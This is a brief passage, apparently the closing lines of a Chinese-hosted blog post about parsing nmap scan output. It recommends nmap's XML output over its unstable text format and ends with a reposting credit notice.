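For anything beyond a lab, run nmap with -oX and parse the XML instead; the text format is for humans and nmap does not promise it is stable, which is why the parser above only trusts the "| name:" / "State:" conventions and ignores everything else.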

Published by: admin. Please credit the source when reposting: http://www.yc00.com/web/1689812941a288268.html
